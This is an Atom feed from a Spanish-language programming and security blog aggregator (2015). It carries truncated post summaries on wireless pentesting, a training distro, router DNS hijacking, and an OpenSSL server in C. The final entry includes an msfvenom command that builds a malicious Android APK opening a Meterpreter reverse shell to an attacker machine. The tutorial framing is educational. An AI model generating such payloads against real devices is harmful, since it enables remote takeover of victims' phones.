<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <title>Blog Stack</title>
  <link rel="alternate" href="http://www.blogstack.info" />
  <subtitle>Un poco más que un agregador/planeta de bitácoras sobre programación, desarrollo, software libre, gnu/linux, tecnología, ...</subtitle>
  <updated>2015-05-27T13:02:08Z</updated>
  <dc:creator>Blog Stack</dc:creator>
  <dc:date>2015-05-27T13:02:08Z</dc:date>
  <dc:language>es</dc:language>
  <entry>
    <title>Cápsulas de Seguridad Informática – Wireless Pentesting desde 0 – Aircrack-ng: Airmon-ng &amp; Airodump-ng</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/capsulas-de-seguridad-informatica-wireless-pentesting-desde-aircrack-ng-airmon-ng-airodump-ng" />
    <category term="ethical-hacking" />
    <category term="seguridad" />
    <category term="capsulassi" />
    <category term="pentesting" />
    <category term="wireless" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-27T12:15:48Z</updated>
    <published>2015-05-27T12:15:48Z</published>
    <content type="html">&lt;p&gt;Y el Snifer anda super activo, no bien publiqué sobre la tercera cápsula y ya tenemos la Cuarta de Wireless Pentesting desde 0. En esta Cápsula veremos dos herramientas de la suite Aircrack-ng, realizando monitoreo, sniffing, identificando equipos conectados. Aquí los dejo con el Video. Voy a crear una sección en el Blog dedicado solo a las cápsulas para que les sea más fácil seguirlas, así que en el transcurso del día busquen en el menú CapsulasSI. Te invito a mirar las otras cápsulas. Lista Reproducción Cápsula de Seguridad Informática- Metasploit desde 0 Lista Reproducción Cápsula de Seguridad Informática- NMAP desde 0 Lista Reproducción Cápsula de Seguridad Informática – OSINT y Python desde 0 Lista Reproducción Cápsula de Seguridad Informática – Wireless Pentesting desde 0 Nos Leemos en[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/capsulas-de-seguridad-informatica-wireless-pentesting-desde-aircrack-ng-airmon-ng-airodump-ng"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-27T12:15:48Z</dc:date>
  </entry>
  <entry>
    <title>Cápsulas de Seguridad Informática – Wireless Pentesting desde 0 – Monitor Mode Sniffing</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/capsulas-de-seguridad-informatica-wireless-pentesting-desde-monitor-mode-sniffing" />
    <category term="ethical-hacking" />
    <category term="seguridad" />
    <category term="capsulassi" />
    <category term="wireless" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-27T00:59:12Z</updated>
    <published>2015-05-27T00:59:12Z</published>
    <content type="html">&lt;p&gt;Aquí los dejo con la tercera cápsula de Wireless pentesting desde 0 llevadas por SniferL4bs, el hombre anda medio averiado pero, aún así trata de sacar el tiempo para grabar las cápsulas. Yo por cierto, debo ponerme al día con las Cápsulas de Metasploit, pero esta semana les prometo que grabaré algunas para subirlas y que nos pongamos manos a la obra. En esta Cápsula veremos que es el modo monitor, los WLAN Frames, algo de sniffing con Wireshark ademas de aprender el uso de iwconfig aun sin usar la suite AIRCRACK-NG. Los dejo con el video. Mira las otras Cápsulas, Lista Reproducción Cápsula de Seguridad Informática- Metasploit desde 0 Lista Reproducción Cápsula de Seguridad Informática- NMAP desde 0 Lista Reproducción Cápsula de Seguridad Informática – OSINT y Python desde 0 Lista Reproducción[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/capsulas-de-seguridad-informatica-wireless-pentesting-desde-monitor-mode-sniffing"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-27T00:59:12Z</dc:date>
  </entry>
  <entry>
    <title>Web Security Dojo – Ambiente controlado para Entrenamiento Web Hacking</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/web-security-dojo-ambiente-controlado-para-entrenamiento-web-hacking" />
    <category term="linux" />
    <category term="ethical-hacking" />
    <category term="seguridad" />
    <category term="websecuritydojo" />
    <category term="penetrationtesting" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-25T15:24:50Z</updated>
    <published>2015-05-25T15:24:50Z</published>
    <content type="html">&lt;p&gt;Cuando se anda aprendiendo esto del Ethical Hacking y demás, siempre es bueno contar con ambientes controlados y autorizados donde podamos ejecutar lo aprendido y ver los resultados. En la red existen Distintas distros con servicios vulnerables, aplicaciones web vulnerables, entre otros, pues hoy me he topado con otra Distro enfocada a crear un ambiente para entrenamiento en la parte de Hacking web, Esta Distro es Web Security Dojo. Web Security Dojo es una distribución que cuenta con un ambiente controlado para el entrenamiento de Penetration Testing a Aplicaciones web, cuenta con los objetivos y las herramientas. Diversas herramientas y aplicaciones web fueron agregadas a una instalacion de Ubuntu 12.04. Entre los objetivos tenemos: Damn Vulnerable Web Appplication, DVWA OWASP WebGoat OWASP[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/web-security-dojo-ambiente-controlado-para-entrenamiento-web-hacking"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-25T15:24:50Z</dc:date>
  </entry>
  <entry>
    <title>Atacantes Secuestrando Routers mediante Los Navegadores</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/atacantes-secuestrando-routers-mediante-los-navegadores" />
    <category term="csfr" />
    <category term="routers" />
    <category term="seguridad" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-25T14:09:58Z</updated>
    <published>2015-05-25T14:09:58Z</published>
    <content type="html">&lt;p&gt;Como siempre aquí dando mis lecturas matutinas para mantenerme actualizado y quiero compartirles una noticia de mucha importancia. Se ha dado a conocer una forma de ataque basado en la web que le permite a un ciberatacante tomar control de los routers cuando el usuario visita un sitio comprometido o visualiza anuncios maliciosos en el navegador. El objetivo de este ataque es reemplazar los servidores DNS configurado en los routers con otros controlados por los atacantes. Esto les permite interceptar el tráfico, Suplantar sitios, secuestrar consultas, inyectar anuncios maliciosos en sitios, entre otros. Al atacante intervenir en este punto puede responder con una ip maliciosa, esto quiero decir que cuando el navegador busque un sitio, este pueder ser redireccionado a otro sitio que por ejemplo,[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/atacantes-secuestrando-routers-mediante-los-navegadores"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-25T14:09:58Z</dc:date>
  </entry>
  <entry>
    <title>Servidor web seguro (HTTPS) en C usando openSSL (pruebas)</title>
    <link rel="alternate" href="http://www.blogstack.info/post/poesiabinaria/2015/05/servidor-web-seguro-https-en-c-usando-openssl-pruebas" />
    <category term="contrasena" />
    <category term="certificado" />
    <category term="peticiones" />
    <category term="seguridad" />
    <category term="servidor" />
    <category term="sockets" />
    <category term="firma" />
    <category term="autoridad" />
    <category term="conexion" />
    <category term="web" />
    <category term="c-c" />
    <category term="servidores" />
    <category term="encriptar" />
    <category term="autofirmado" />
    <category term="ssl" />
    <category term="certificadora" />
    <category term="general" />
    <category term="aceptar" />
    <category term="comunicacion" />
    <author>
      <name>Gaspar Fernández</name>
    </author>
    <updated>2015-05-25T08:03:09Z</updated>
    <published>2015-05-25T08:03:09Z</published>
    <content type="html">&lt;p&gt;Hace unos días veíamos un ejemplo de un cliente web SSL con ayuda de openSSL. Ahora vamos a hacer un servidor al que se pueda conectar. Se trata sólo de una prueba de concepto, nada que podamos utilizar en el mundo real, pero está bien para ver cómo funciona la biblioteca. Creando un certificado auto-firmado Lo primero que vamos a hacer es crear una llave y un certificado para utilizarlos. Como estamos probando y no vamos a gastar dinero ni nada en un certificado, podemos crear un autofirmado, ya sabéis, los navegadores no nos detectarán como fuentes de confianza pero tendremos una conexión segura. Para ello, nos ponemos en un directorio de confianza (vamos a colocar ahí archivos sensibles, al menos vamos a crearlos ahí… por lo menos que no sea una carpeta compartida en emule) y en nuestra[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/poesiabinaria/2015/05/servidor-web-seguro-https-en-c-usando-openssl-pruebas"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Gaspar Fernández</dc:creator>
    <dc:date>2015-05-25T08:03:09Z</dc:date>
  </entry>
  <entry>
    <title>Evento en Directo – Presentación del Proyecto IT TALKS</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/evento-en-directo-presentacion-del-proyecto-it-talks" />
    <category term="it-talks" />
    <category term="linux" />
    <category term="generales" />
    <category term="seguridad" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-20T14:24:18Z</updated>
    <published>2015-05-20T14:24:18Z</published>
    <content type="html">&lt;p&gt;Como saben tuvimos unos problemas para emitir el evento el domingo pasado como lo teníamos programado, Y en conversación con SniferL4bs reprogramamos para este domingo que viene. Acompañanos en este Primer Hangout donde mi persona Jason Soto @Jsitech y Jose Moruno Cadima @SniferL4bs presentan el proyecto de IT TALKS. Veremos De que se trata? Conoce quiénes están detrás de IT TALKS Que pueden esperar? Nuestro Objetivo? Vamos a hablar un poco del proyecto de Cápsulas de Seguridad Informática iniciado por Jose Moruno Cadima “La cita es el Domingo 24 de Mayo a las 8:00PM” Pueden seguir la transmisión aqui mismo.   Link de Interés Página del Evento en Google+[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/evento-en-directo-presentacion-del-proyecto-it-talks"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-20T14:24:18Z</dc:date>
  </entry>
  <entry>
    <title>Comprometiendo un Equipo Android con Metasploit</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/comprometiendo-un-equipo-android-con-metasploit" />
    <category term="metasploit" />
    <category term="ethical-hacking" />
    <category term="android" />
    <category term="seguridad" />
    <category term="msfvenom" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-16T22:13:52Z</updated>
    <published>2015-05-16T22:13:52Z</published>
    <content type="html">&lt;p&gt;Una de mis herramientas de seguridad favorita es Metasploit, y es por todas las funcionalidades que este framework nos da para realizar pruebas de seguridad a diversas plataformas. Hoy vamos a ver como podemos comprometer un equipo Android simplemente creando un APK malicioso que haga una conexión a nuestra máquina atacante, solo veremos lo de crear el ataque, la parte de lograr que su usuario instale y ejecute el APK, se los dejo a ustedes. Este post lo realizo usando, un Motorola con Android 4.4, Kali Linux y Metasploit. Para crear el APK Malicioso vamos a utilizar MSFvenom y nuestra máquina atacante es la 10.0.0.11 Creamos el Archivo Malicioso # msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.11 LPORT=4444 &gt; kali.apk Si verificamos, nos creo un archivo kali.apk, este es el que debemos[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/comprometiendo-un-equipo-android-con-metasploit"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-16T22:13:52Z</dc:date>
  </entry>
</feed>

